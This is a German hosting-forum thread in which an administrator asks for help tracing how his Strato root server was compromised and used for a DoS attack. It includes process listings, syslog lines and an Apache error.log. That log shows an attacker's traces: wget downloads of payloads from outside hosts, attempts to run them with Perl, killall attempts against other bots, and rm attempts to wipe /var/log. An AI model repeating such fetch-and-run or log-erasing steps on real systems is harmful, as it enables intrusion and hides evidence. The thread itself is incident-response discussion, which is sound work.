Server angegriffen - ursachenfindung

T

thomas1905

New Member
So nun hat es mich leider auch einmal erwischt.

Mein Server wurde als DDOS Angriff auf andere Rechner verwendet. Jetzt bräuchte ich mal etwas Unterstützung bei der Fehlerbeseitigung/-diganose. Wie lokalisiere ich am besten ob der Angriff über eine Schwachstelle des Servers kam oder ob ein schwaches PHP Skript schuld ist.

Der Server liegt bei Strato und ist mittlerweile vom Netz. Ich habe eine Debian/Sarge Installation nach dieser hier installiert.

weiterhin habe ich regelmäßige Updates mit Aptitude update/upgrade gemacht.
Code: 
ps waux

USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  1504  512 ?        S    11:07   0:01 init [2]
root         2  0.0  0.0     0    0 ?        SN   11:07   0:00 [ksoftirqd/0]
root         3  0.1  0.0     0    0 ?        S<   11:07   0:03 [events/0]
root         4  0.0  0.0     0    0 ?        S<   11:07   0:00 [khelper]
root         5  0.0  0.0     0    0 ?        S<   11:07   0:00 [kacpid]
root        38  0.0  0.0     0    0 ?        S<   11:07   0:00 [kblockd/0]
root        48  0.0  0.0     0    0 ?        S    11:07   0:00 [pdflush]
root        49  0.0  0.0     0    0 ?        S    11:07   0:00 [pdflush]
root        51  0.0  0.0     0    0 ?        S<   11:07   0:00 [aio/0]
root        50  0.0  0.0     0    0 ?        S    11:07   0:00 [kswapd0]
root       187  0.0  0.0     0    0 ?        S    11:07   0:00 [kseriod]
root       274  0.0  0.0     0    0 ?        S    11:07   0:00 [md1_raid1]
root       305  0.0  0.0     0    0 ?        S    11:07   0:00 [kjournald]
root       628  0.0  0.0     0    0 ?        S    11:08   0:00 [md0_raid1]
root       655  0.0  0.0     0    0 ?        S    11:08   0:00 [md2_raid1]
root       678  0.0  0.0     0    0 ?        S    11:08   0:00 [md3_raid1]
root       702  0.0  0.0     0    0 ?        S    11:08   0:00 [md4_raid1]
root       747  0.0  0.0     0    0 ?        S    11:08   0:00 [kjournald]
root       748  0.0  0.0     0    0 ?        S    11:08   0:00 [kjournald]
root       749  0.0  0.0     0    0 ?        S    11:08   0:00 [kjournald]
root       750  0.0  0.0     0    0 ?        S    11:08   0:00 [kjournald]
root       903  0.0  0.0  1560  592 ?        Ss   11:10   0:00 /sbin/syslogd
root       906  0.0  0.1  2412 1476 ?        Ss   11:10   0:00 /sbin/klogd
bind       914  0.0  0.3 29864 3124 ?        Ss   11:10   0:00 /usr/sbin/named -u bind
root       934  0.0  0.1  2508 1236 ?        S    11:10   0:00 /bin/sh /usr/bin/mysqld_safe
mysql      971  0.0  2.5 119712 26688 ?      S    11:10   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
root       972  0.0  0.0  1488  500 ?        S    11:10   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
amavis    1019  0.0  6.3 68392 65432 ?       Ss   11:10   0:01 amavisd (master)
clamav    1030  0.0  2.0 40528 21696 ?       Ss   11:10   0:00 /usr/sbin/clamd
clamav    1081  0.0  0.1  4104 1312 ?        Ss   11:10   0:00 /usr/bin/freshclam -p /var/run/clamav/freshclam.pid -d --quiet
root      1089  0.0  0.0  1672  476 ?        S    11:10   0:00 /usr/sbin/courierlogger -pid=/var/run/courier/authdaemon/pid -start /
root      1090  0.0  0.0  1808  508 ?        S    11:10   0:00 /usr/lib/courier/authlib/authdaemond.plain
root      1092  0.0  0.0  1808  508 ?        S    11:10   0:00 /usr/lib/courier/authlib/authdaemond.plain
root      1093  0.0  0.0  1808  508 ?        S    11:10   0:00 /usr/lib/courier/authlib/authdaemond.plain
root      1094  0.0  0.0  1808  508 ?        S    11:10   0:00 /usr/lib/courier/authlib/authdaemond.plain
root      1095  0.0  0.0  1808  508 ?        S    11:10   0:00 /usr/lib/courier/authlib/authdaemond.plain
root      1096  0.0  0.0  1808  508 ?        S    11:10   0:00 /usr/lib/courier/authlib/authdaemond.plain
root      1101  0.0  0.0  1776  540 ?        S    11:10   0:00 /usr/sbin/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogge
root      1103  0.0  0.0  1540  300 ?        S    11:10   0:00 /usr/sbin/courierlogger imaplogin
root      1109  0.0  0.0  1776  540 ?        S    11:10   0:00 /usr/sbin/couriertcpd -pid=/var/run/courier/pop3d.pid -stderrlogger=/
root      1111  0.0  0.0  1540  300 ?        S    11:10   0:00 /usr/sbin/courierlogger courierpop3login
root      1118  0.0  0.0  1496  444 ?        Ss   11:10   0:00 /usr/sbin/inetd
root      1215  0.0  0.1  2972 1184 ?        Ss   11:10   0:00 /usr/lib/postfix/master
postfix   1216  0.0  0.1  2980 1216 ?        S    11:10   0:00 pickup -l -t fifo -u -c
postfix   1217  0.0  0.1  3012 1276 ?        S    11:10   0:00 qmgr -l -t fifo -u -c
root      1275  0.0  0.0  1844  836 ?        S    11:10   0:00 /usr/sbin/smartd --pidfile /var/run/smartd.pid
root      1281  0.0  0.1  3468 1504 ?        Ss   11:10   0:00 /usr/sbin/sshd
root      1285  0.0  0.0  1696  692 ?        Ss   11:10   0:00 /sbin/mdadm -F -i /var/run/mdadm.pid -m [EMAIL="ruth@witouris.de"]ruth@witouris.de[/EMAIL] -f -s
amavis    1293  0.0  6.4 69360 66620 ?       S    11:10   0:01 amavisd (ch3-avail)
amavis    1294  0.1  6.7 73416 70432 ?       S    11:10   0:04 amavisd (ch2-avail)
daemon    1316  0.0  0.0  1684  628 ?        Ss   11:11   0:00 /usr/sbin/atd
root      1319  0.0  0.0  1764  820 ?        Ss   11:11   0:00 /usr/sbin/cron
root      1379  0.0  0.8 20348 8800 ?        Ss   11:12   0:00 /usr/sbin/apache2 -k start -DSSL
root      1416  0.0  0.0  1492  472 ?        S    11:12   0:00 /var/www/vhcs2/daemon/vhcs2_daemon -p /var/run/vhcs2-daemon.pid
root      1429  0.0  0.0  1500  484 tty1     Ss+  11:12   0:00 /sbin/getty 38400 tty1
root      1430  0.0  0.0  1500  484 tty2     Ss+  11:12   0:00 /sbin/getty 38400 tty2
root      1431  0.0  0.0  1500  484 tty3     Ss+  11:12   0:00 /sbin/getty 38400 tty3
root      1432  0.0  0.0  1500  484 tty4     Ss+  11:12   0:00 /sbin/getty 38400 tty4
root      1433  0.0  0.0  1500  484 tty5     Ss+  11:12   0:00 /sbin/getty 38400 tty5
root      1434  0.0  0.0  1500  484 tty6     Ss+  11:12   0:00 /sbin/getty 38400 tty6
www-data  2142  0.0  0.8 20348 8824 ?        S    11:13   0:00 /usr/sbin/apache2 -k start -DSSL
www-data  2143  0.0  0.8 20348 8824 ?        S    11:13   0:00 /usr/sbin/apache2 -k start -DSSL
www-data  2144  0.0  0.8 20348 8824 ?        S    11:13   0:00 /usr/sbin/apache2 -k start -DSSL
www-data  2145  0.0  0.8 20348 8824 ?        S    11:13   0:00 /usr/sbin/apache2 -k start -DSSL
www-data  2146  0.0  0.8 20348 8824 ?        S    11:13   0:00 /usr/sbin/apache2 -k start -DSSL
root      2301  0.0  0.1  2576 1420 ttyS0    Ss   11:31   0:00 -bash
postfix   3217  0.0  0.1  3176 1572 ?        S    12:02   0:00 cleanup -z -t unix -u -c
postfix   3218  0.0  0.1  3508 1548 ?        S    12:02   0:00 trivial-rewrite -n rewrite -t unix -u -c
postfix   3221  0.0  0.1  4360 1608 ?        S    12:02   0:00 smtp -n smtp-amavis -t unix -u -o smtp_data_done_timeout 1200 -o smtp
postfix   3222  0.0  0.1  4360 1608 ?        S    12:02   0:00 smtp -n smtp-amavis -t unix -u -o smtp_data_done_timeout 1200 -o smtp
postfix   3232  0.0  0.2  5468 2352 ?        S    12:02   0:00 smtpd -n localhost:10025 -t inet -u -o content_filter  -o receive_ove
root      3245  0.0  0.0  2496  844 ttyS0    R+   12:04   0:00

top -b -n 1
Code: 
top - 12:32:14 up  1:24,  1 user,  load average: 0.07, 0.07, 0.02
Tasks:  68 total,   1 running,  67 sleeping,   0 stopped,   0 zombie
Cpu(s):  1.0% us,  0.2% sy,  0.1% ni, 97.5% id,  1.2% wa,  0.0% hi,  0.0% si
Mem:   1036524k total,   446032k used,   590492k free,    13552k buffers
Swap:  4000168k total,        0k used,  4000168k free,   228544k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
    1 root      16   0  1504  512 1352 S  0.0  0.0   0:01.49 init
    2 root      34  19     0    0    0 S  0.0  0.0   0:00.00 ksoftirqd/0
    3 root       5 -10     0    0    0 S  0.0  0.0   0:03.89 events/0
    4 root      14 -10     0    0    0 S  0.0  0.0   0:00.00 khelper
    5 root      13 -10     0    0    0 S  0.0  0.0   0:00.00 kacpid
   38 root       5 -10     0    0    0 S  0.0  0.0   0:00.01 kblockd/0
   48 root      20   0     0    0    0 S  0.0  0.0   0:00.00 pdflush
   49 root      15   0     0    0    0 S  0.0  0.0   0:00.00 pdflush
   51 root       5 -10     0    0    0 S  0.0  0.0   0:00.00 aio/0
   50 root      25   0     0    0    0 S  0.0  0.0   0:00.00 kswapd0
  187 root      25   0     0    0    0 S  0.0  0.0   0:00.00 kseriod
  274 root      15   0     0    0    0 S  0.0  0.0   0:00.00 md1_raid1
  305 root      15   0     0    0    0 S  0.0  0.0   0:00.01 kjournald
  628 root      15   0     0    0    0 S  0.0  0.0   0:00.00 md0_raid1
  655 root      15   0     0    0    0 S  0.0  0.0   0:00.00 md2_raid1
  678 root      15   0     0    0    0 S  0.0  0.0   0:00.00 md3_raid1
  702 root      15   0     0    0    0 S  0.0  0.0   0:00.00 md4_raid1
  747 root      15   0     0    0    0 S  0.0  0.0   0:00.07 kjournald
  748 root      18   0     0    0    0 S  0.0  0.0   0:00.00 kjournald
  749 root      15   0     0    0    0 S  0.0  0.0   0:00.00 kjournald
  750 root      15   0     0    0    0 S  0.0  0.0   0:00.02 kjournald
  903 root      16   0  1560  592 1392 S  0.0  0.1   0:00.01 syslogd
  906 root      16   0  2412 1476 1344 S  0.0  0.1   0:00.06 klogd
  914 bind      18   0 29864 3124 4248 S  0.0  0.3   0:00.00 named
  934 root      22   0  2508 1236 2380 S  0.0  0.1   0:00.00 mysqld_safe
  971 mysql     16   0  116m  26m 8920 S  0.0  2.6   0:00.04 mysqld
  972 root      16   0  1488  500 1332 S  0.0  0.0   0:00.00 logger
 1019 amavis    16   0 68392  63m 5196 S  0.0  6.3   0:01.39 amavisd-new
 1030 clamav    16   0 40528  21m 3796 S  0.0  2.1   0:00.00 clamd
 1081 clamav    16   0  4104 1312 3876 S  0.0  0.1   0:00.00 freshclam
 1089 root      19   0  1672  476 1360 S  0.0  0.0   0:00.00 courierlogger
 1090 root      16   0  1808  508 1468 S  0.0  0.0   0:00.00 authdaemond.pla
 1092 root      16   0  1808  508 1468 S  0.0  0.0   0:00.00 authdaemond.pla
 1093 root      16   0  1808  508 1468 S  0.0  0.0   0:00.00 authdaemond.pla
 1094 root      16   0  1808  508 1468 S  0.0  0.0   0:00.00 authdaemond.pla
 1095 root      16   0  1808  508 1468 S  0.0  0.0   0:00.00 authdaemond.pla
 1096 root      16   0  1808  508 1468 S  0.0  0.0   0:00.00 authdaemond.pla
 1101 root      22   0  1776  540 1464 S  0.0  0.1   0:00.00 couriertcpd
 1103 root      22   0  1540  300 1360 S  0.0  0.0   0:00.00 courierlogger
 1109 root      23   0  1776  540 1464 S  0.0  0.1   0:00.00 couriertcpd
 1111 root      23   0  1540  300 1360 S  0.0  0.0   0:00.00 courierlogger
 1118 root      19   0  1496  444 1344 S  0.0  0.0   0:00.00 inetd
 1215 root      16   0  2972 1184 2780 S  0.0  0.1   0:00.00 master
 1216 postfix   16   0  2980 1216 2788 S  0.0  0.1   0:00.00 pickup
 1217 postfix   16   0  3012 1276 2820 S  0.0  0.1   0:00.01 qmgr
 1275 root      16   0  1844  836 1500 S  0.0  0.1   0:00.00 smartd
 1281 root      18   0  3468 1504 3092 S  0.0  0.1   0:00.00 sshd
 1285 root      16   0  1696  692 1408 S  0.0  0.1   0:00.10 mdadm
 1293 amavis    16   0 69360  65m 5212 S  0.0  6.4   0:01.14 amavisd-new
 1294 amavis    16   0 73416  68m 5196 S  0.0  6.8   0:04.66 amavisd-new
 1316 daemon    16   0  1684  628 1520 S  0.0  0.1   0:00.00 atd
 1319 root      16   0  1764  820 1576 S  0.0  0.1   0:00.00 cron
 1379 root      16   0 20348 8800  15m S  0.0  0.8   0:00.11 apache2
 1416 root      22   0  1492  472 1336 S  0.0  0.0   0:00.00 vhcs2_daemon
 1429 root      16   0  1500  484 1336 S  0.0  0.0   0:00.00 getty
 1430 root      16   0  1500  484 1336 S  0.0  0.0   0:00.00 getty
 1431 root      16   0  1500  484 1336 S  0.0  0.0   0:00.00 getty
 1432 root      16   0  1500  484 1336 S  0.0  0.0   0:00.00 getty
 1433 root      16   0  1500  484 1336 S  0.0  0.0   0:00.00 getty
 1434 root      16   0  1500  484 1336 S  0.0  0.0   0:00.00 getty
 2142 www-data  17   0 20348 8824  15m S  0.0  0.9   0:00.00 apache2
 2143 www-data  17   0 20348 8824  15m S  0.0  0.9   0:00.00 apache2
 2144 www-data  17   0 20348 8824  15m S  0.0  0.9   0:00.00 apache2
 2145 www-data  19   0 20348 8824  15m S  0.0  0.9   0:00.00 apache2
 2146 www-data  19   0 20348 8824  15m S  0.0  0.9   0:00.00 apache2
 2301 root      15   0  2576 1424 2380 S  0.0  0.1   0:00.00 bash
 3467 postfix   16   0  3508 1552 2796 S  0.0  0.1   0:00.00 trivial-rewrite
 3474 root      15   0  2060  932 1852 R  0.0  0.1   0:00.00 top

Installiert ist:
MySQL, PHP, AMAVIS, Apache, Postfix, mda-Tools für den Raid, clamav, VHCS (mit Patch)

Eine Neuinstallation ist eh klar, aber ich möchte vorher gern das Problem erkennen um nach der Installation nicht wieder gehackt zu werden.

beste grüße
thomas
 
Last edited by a moderator:
Schau doch mal ganz unverbindlich ins Log. Welche "Beweise" hat Dir Strato geschickt. Welche Art von DDoS hat Dein Server gefahren? Bot-Netz? Im Rescue-Modus wirst Du mittels top o.ä. gar nichts herausfinden.

Schau einfach mal in die Apache-Logfiles ob beim ersten Blick irgendwas zu entdecken ist. Auch die messages und warn Logfiles sind auf jeden Fall mal ein Blick wert.
 
Allein wegen der Wahrscheinlichkeit würde ich auf PHP tippen. Wenn Du nach der verlinkten Anleitung installiert hast - das HowTo informiert nicht über die Konfiguration des Systems in puncto Sicherheit. Hast Du nichts weiter vorgenommen, war Dein PHP offen wie ein Scheunentor, SSH zumindest für BruteForce auf Standardport 22 empfänglich und evtl. auch für Attacken auf SSH1 basierend...usw.

Vielleicht beginnst Du damit herauszufinden, welche Aktivitäten zur Zeit des Angriffes vorgenommen wurden und mit welchen Dateien dort gearbeitet wurde. Diese Dateien ausfindig machen und die Logfiles des Apache, syslog etc. danach durchsuchen. Zeitstempel der Erstellung als Anhaltspunkt vielleicht.

Oder andersherum: Logfiles ausmisten in dem Sinne, dass "normale" Aktivitäten herausgefiltert werden.

Grüße
Sinepp
 
Hat Dir Strato denn Einzelheiten dazu genannt, oder wie bist Du darauf aufmerksam geworden dass Dein Server "solche bösen Sache" gemacht hat?

lg Basti
 
@maneus: so wie ich strato verstanden habe, ist der server zwar vom netz aber noch voll einsatzbereit. Er ist nur über die serielle Konsole erreichbar.
Daher die geposteten Top und ps Werte.

Es werden ja auch alle Dieste gestartet (Mysql, Apache etc.), AUßerdem musste ich mir auch nicht erst die Platten mounten wie es im Rescue üblich ist.

Hallo hier noch einmal die Log-Files:

Zuerst die var/log/messages

Code: 
 grep -i "Sep 18" messages
Sep 18 00:06:12 witouris -- MARK --
Sep 18 00:26:13 witouris -- MARK --
Sep 18 00:46:13 witouris -- MARK --
Sep 18 01:06:13 witouris -- MARK --
Sep 18 01:26:13 witouris -- MARK --
Sep 18 01:46:13 witouris -- MARK --
Sep 18 02:06:13 witouris -- MARK --
Sep 18 02:26:13 witouris -- MARK --
Sep 18 02:46:13 witouris -- MARK --
Sep 18 03:06:13 witouris -- MARK --
Sep 18 03:26:13 witouris -- MARK --
Sep 18 03:46:13 witouris -- MARK --
Sep 18 04:06:13 witouris -- MARK --
Sep 18 04:11:41 witouris kernel: tg3: eth0: Link is down.
Sep 18 04:26:13 witouris -- MARK --
Sep 18 04:46:13 witouris -- MARK --
Sep 18 05:06:13 witouris -- MARK --
Sep 18 05:26:13 witouris -- MARK --
Steht nur Mark drin, 4:11Uhr wurde der Server vom netz genommen.
Weiterhin habe ich keine /var/log/warn

in den Logfiles vom Apache stehen nur die normalen Aufrufe von Dateien drin.

@Sinepp:
Das Thema PHP Sicherheit interessiert mich dann noch genauer. Das PHP hab ich nach einem Howto aus dem VHCS Forum installiert (Leider nicht mehr verfügbar). Weiterhin sind die Möglichkeiten die ich verwende register_globals = off; openbasedir; magic_quotes, sowie Safe-mode. PHP läuft als CGI und nicht als Modul.

Zum Thema Brute-Force von SSH las ich hier im Forum das es nicht bringt den Port von 22 auf einen anderen zu legen, da entsprechende Programme das trotzdem finden.

@traced:
Strato hat den Server vom Netz genommen und ich habe dann eine SMS bekommen. Im Kundencenter steht, dass der Server vom Abuse-Team vom Netz genommen wurde. Im Trafficmonitor ist zu lesen, dass der Server vor Abschalten einen Traffic von 25Mbit/s verursacht hat. normal sind etwa 1-2Mbit.

bevors von vorn losgeht, möchte ich zu gern die Ursache kennen.

Ciao Thomas
 
Ich weiß nicht was für einen Rescue-Modus Strato bei Root-Servern verwendet, aber ich denke nicht, dass Dein System live im Netz hängt, oder kann man die Webseiten auf dem Server erreichen? Die top-Prozesse lassen nichts ungewöhnliches entdecken. Interessant wäre ein Mitschnitt des Traffics (sollte von Strato zu bekommen sein). Ich tippe auf die unfreiwillige Teilnahme an einem Botnetz.

Zum Thema SSH: Natürlich kann der SSH-Port noch gefunden werden, aber die Standardskripte gehen alle auf Port 22. Ist der dicht, wird die nächste IP versucht --> also machen!
 
Hallo marneus,

die Webseiten sind natürlich nicht zu erreichen. Nur könnte es auch sein, das die den Rechner am Switch "abgeklemmt" haben und er aber ansonsten normal läuft. Ich kannte das vom Rescue System bei 1und1 (damals aber noch ohne serielle konsole) dort müsste man ein extra debian booten. Hier habe ich über die Konsole jedweden Zugriff auf meine Programme und Daten.


Thomas
 
Diese Stellungnahme erhielt ich eben von Strato

Zeit Auftrags-Nr. IP-Adresse Hostname Grund
-----------------------------------------------------------------------------
04:25:08 208xxx 85.214.74.xxx h106xxxx.serverkompetenz.net 38374 ausgehende Pakete/s (DoS)

Für näheres müssen Sie Ihre Log-Files auswerten, weitergehnde werden bei Rootserver nicht durch uns nicht angefertigt.


mittlerweile habe ich eine error.log gefunden in der steht folgendes:



Code: 
error.log           [----]  1 L:[  4+27  31/887] *(1360/48850b)= g 103 0x67
[Sun Sep 16 06:25:37 2007] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec2)
[Sun Sep 16 06:25:38 2007] [notice] Apache/2.0.54 (Debian GNU/Linux) PHP/5.1.4-Debian-0.1~sarge1 mod_ssl/2.0.54 OpenSSL/0.9.7e configured -- resumin
[Sun Sep 16 09:27:21 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
inetd(1208): Operation not permitted
php: no process killed
mech: no process killed
inetd: no process killed
eggdrop: no process killed
httpd: no process killed
perl5.8.6: no process killed
perl5.8.8: no process killed
perl: no process killed
perl5.8.7: no process killed
inetd(1208): Operation not permitted
php: no process killed
mech: no process killed
inetd: no process killed
eggdrop: no process killed
httpd: no process killed
perl5.8.6: no process killed
perl5.8.8: no process killed
perl: no process killed
perl5.8.7: no process killed
inetd(1208): Operation not permitted
php: no process killed
mech: no process killed
inetd: no process killed
eggdrop: no process killed
httpd: no process killed
perl5.8.6: no process killed
perl5.8.8: no process killed
perl: no process killed
perl5.8.7: no process killed
inetd(1208): Operation not permitted
php: no process killed
mech: no process killed
inetd: no process killed
eggdrop: no process killed
httpd: no process killed
perl5.8.6: no process killed
perl5.8.8: no process killed
perl: no process killed
perl5.8.7: no process killed
inetd(1208): Operation not permitted
php: no process killed
mech: no process killed
inetd: no process killed
eggdrop: no process killed
httpd: no process killed
perl5.8.6: no process killed
perl5.8.8: no process killed
perl: no process killed
perl5.8.7: no process killed
--03:32:14--  http://www.vesprokat.ru/b.txt
           => `b.txt'
Resolving www.vesprokat.ru... 85.249.135.2
Connecting to www.vesprokat.ru[85.249.135.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,403 [text/plain]

    0K .                                                     100%   13.38 MB/s

03:32:14 (13.38 MB/s) - `b.txt' saved [1403/1403]

[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: curl: command not found
Can't open perl script "b.txt": No such file or directory
Can't open perl script "b.txt": No such file or directory
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: fetch: command not found
--03:32:15--  http://www.vesprokat.ru/b.txt
           => `b.txt'
Resolving www.vesprokat.ru... 85.249.135.2
Connecting to www.vesprokat.ru[85.249.135.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,403 [text/plain]

    0K .                                                     100%   13.38 MB/s

03:32:15 (13.38 MB/s) - `b.txt' saved [1403/1403]

[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: curl: command not found
Can't open perl script "b.txt": No such file or directory
Can't open perl script "b.txt": No such file or directory
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
error.log           [----] 21 L:[ 98+93 191/887] *(7331/48850b)= a  97 0x61
sh: line 1: fetch: command not found
--03:32:15--  http://www.vesprokat.ru/b.txt
           => `b.txt'
Resolving www.vesprokat.ru... 85.249.135.2
Connecting to www.vesprokat.ru[85.249.135.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,403 [text/plain]

    0K .                                                     100%   13.38 MB/s

03:32:16 (13.38 MB/s) - `b.txt' saved [1403/1403]

[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: curl: command not found
Can't open perl script "b.txt": No such file or directory
Can't open perl script "b.txt": No such file or directory
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: fetch: command not found
--03:32:16--  http://www.vesprokat.ru/b.txt
           => `b.txt'
Resolving www.vesprokat.ru... 85.249.135.2
Connecting to www.vesprokat.ru[85.249.135.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,403 [text/plain]

    0K .                                                     100%   13.38 MB/s

03:32:16 (13.38 MB/s) - `b.txt' saved [1403/1403]

[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: curl: command not found
Can't open perl script "b.txt": No such file or directory
Can't open perl script "b.txt": No such file or directory
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: fetch: command not found
--03:32:17--  http://www.vesprokat.ru/b.txt
           => `b.txt'
Resolving www.vesprokat.ru... 85.249.135.2
Connecting to www.vesprokat.ru[85.249.135.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,403 [text/plain]

    0K .                                                     100%  133.80 MB/s

03:32:17 (133.80 MB/s) - `b.txt' saved [1403/1403]

[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: curl: command not found
Can't open perl script "b.txt": No such file or directory
Can't open perl script "b.txt": No such file or directory
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
[x] xeQution Failed..
sh: line 1: fetch: command not found
rm: cannot remove `/var/log/amavis.log': Permission denied
rm: cannot remove `/var/log/apache2': Permission denied
rm: cannot remove `/var/log/aptitude': Permission denied
rm: cannot remove `/var/log/aptitude.1.gz': Permission denied
rm: cannot remove `/var/log/aptitude.2.gz': Permission denied
rm: cannot remove `/var/log/aptitude.3.gz': Permission denied
rm: cannot remove `/var/log/aptitude.4.gz': Permission denied
rm: cannot remove `/var/log/aptitude.5.gz': Permission denied
rm: cannot remove `/var/log/aptitude.6.gz': Permission denied
rm: cannot remove `/var/log/auth.log': Permission denied
rm: cannot remove `/var/log/auth.log.0': Permission denied
rm: cannot remove `/var/log/auth.log.1.gz': Permission denied
rm: cannot remove `/var/log/auth.log.2.gz': Permission denied
rm: cannot remove `/var/log/auth.log.3.gz': Permission denied
rm: cannot remove `/var/log/auth.log.4.gz': Permission denied
rm: cannot remove `/var/log/auth.log.5.gz': Permission denied
rm: cannot remove `/var/log/auth.log.6.gz': Permission denied
rm: cannot remove `/var/log/btmp': Permission denied
rm: cannot remove `/var/log/btmp.1': Permission denied
rm: cannot remove `/var/log/clamav': Permission denied
rm: cannot remove `/var/log/daemon.log': Permission denied
rm: cannot remove `/var/log/daemon.log.0': Permission denied
rm: cannot remove `/var/log/daemon.log.1.gz': Permission denied
rm: cannot remove `/var/log/daemon.log.2.gz': Permission denied
rm: cannot remove `/var/log/daemon.log.3.gz': Permission denied
rm: cannot remove `/var/log/daemon.log.4.gz': Permission denied
rm: cannot remove `/var/log/daemon.log.5.gz': Permission denied
rm: cannot remove `/var/log/daemon.log.6.gz': Permission denied
rm: cannot remove `/var/log/debug': Permission denied
rm: cannot remove `/var/log/debug.0': Permission denied
error.log           [----]  0 L:[794+93 887/887] *(48850/48850b)= <EOF>
rm: cannot remove `/var/log/mysql.err': Permission denied
rm: cannot remove `/var/log/mysql.err.1.gz': Permission denied
rm: cannot remove `/var/log/mysql.err.2.gz': Permission denied
rm: cannot remove `/var/log/mysql.err.3.gz': Permission denied
rm: cannot remove `/var/log/mysql.err.4.gz': Permission denied
rm: cannot remove `/var/log/mysql.err.5.gz': Permission denied
rm: cannot remove `/var/log/mysql.err.6.gz': Permission denied
rm: cannot remove `/var/log/mysql.err.7.gz': Permission denied
rm: cannot remove `/var/log/mysql.log': Permission denied
rm: cannot remove `/var/log/mysql.log.1.gz': Permission denied
rm: cannot remove `/var/log/mysql.log.2.gz': Permission denied
rm: cannot remove `/var/log/mysql.log.3.gz': Permission denied
rm: cannot remove `/var/log/mysql.log.4.gz': Permission denied
rm: cannot remove `/var/log/mysql.log.5.gz': Permission denied
rm: cannot remove `/var/log/mysql.log.6.gz': Permission denied
rm: cannot remove `/var/log/mysql.log.7.gz': Permission denied
rm: cannot remove `/var/log/news': Permission denied
rm: cannot remove `/var/log/raid_status0.log': Permission denied
rm: cannot remove `/var/log/raid_status1.log': Permission denied
rm: cannot remove `/var/log/raid_status2.log': Permission denied
rm: cannot remove `/var/log/raid_status3.log': Permission denied
rm: cannot remove `/var/log/raid_status4.log': Permission denied
rm: cannot remove `/var/log/syslog': Permission denied
rm: cannot remove `/var/log/syslog.0': Permission denied
rm: cannot remove `/var/log/syslog.1.gz': Permission denied
rm: cannot remove `/var/log/syslog.2.gz': Permission denied
rm: cannot remove `/var/log/syslog.3.gz': Permission denied
rm: cannot remove `/var/log/syslog.4.gz': Permission denied
rm: cannot remove `/var/log/syslog.5.gz': Permission denied
rm: cannot remove `/var/log/syslog.6.gz': Permission denied
rm: cannot remove `/var/log/user.log': Permission denied
rm: cannot remove `/var/log/user.log.0': Permission denied
rm: cannot remove `/var/log/user.log.1.gz': Permission denied
rm: cannot remove `/var/log/user.log.2.gz': Permission denied
rm: cannot remove `/var/log/user.log.3.gz': Permission denied
rm: cannot remove `/var/log/uucp.log': Permission denied
rm: cannot remove `/var/log/vhcs2': Permission denied
rm: cannot remove `/var/log/webmin': Permission denied
rm: cannot remove `/var/log/wtmp': Permission denied
rm: cannot remove `/var/log/wtmp.1': Permission denied
rm: cannot remove `/var/log/xferlog': Permission denied
rm: cannot remove `/var/log/xferlog.0': Permission denied
rm: cannot remove `/var/log/xferlog.1.gz': Permission denied
rm: cannot remove `/var/log/xferlog.2.gz': Permission denied
rm: cannot remove `/var/log/xferlog.3.gz': Permission denied
rm: cannot remove `/var/log/xferlog.4.gz': Permission denied
rm: cannot remove `/var/log/xferlog.5.gz': Permission denied
rm: cannot remove `/var/log/xferlog.6.gz': Permission denied
rm: cannot remove `/var/log/xferreport': Permission denied
rm: cannot remove `/var/log/xferreport.0': Permission denied
rm: cannot remove `/var/log/xferreport.1.gz': Permission denied
rm: cannot remove `/var/log/xferreport.2.gz': Permission denied
rm: cannot remove `/var/log/xferreport.3.gz': Permission denied
rm: cannot remove `/var/log/xferreport.4.gz': Permission denied
rm: cannot remove `/var/log/xferreport.5.gz': Permission denied
rm: cannot remove `/var/log/xferreport.6.gz': Permission denied
rm: cannot remove `/var/log/xferreport.7.gz': Permission denied
inetd(1208): Operation not permitted
php: no process killed
mech: no process killed
inetd: no process killed
eggdrop: no process killed
httpd: no process killed
sh: line 1: sysctl: command not found
sh: line 1: sysctl: command not found
sh: line 1: sysctl: command not found
sh: line 1: sysctl: command not found
--03:20:54--  http://www.pfaubert.com/sendmail
           => `sendmail'
Resolving www.pfaubert.com... 194.183.224.104
Connecting to www.pfaubert.com[194.183.224.104]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,745 [text/plain]

    0K .......... .......... .........                       100%  278.24 KB/s

03:20:56 (278.24 KB/s) - `sendmail' saved [29745/29745]

[Tue Sep 18 05:29:13 2007] [notice] caught SIGTERM, shutting down
[Tue Sep 18 05:36:40 2007] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec2)
[Tue Sep 18 05:38:20 2007] [notice] Apache/2.0.54 (Debian GNU/Linux) PHP/5.1.4-Debian-0.1~sarge1 mod_ssl/2.0.54 OpenSSL/0.9.7e configured -- resumin
[Tue Sep 18 06:25:53 2007] [notice] caught SIGTERM, shutting down
[Tue Sep 18 06:26:14 2007] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec2)
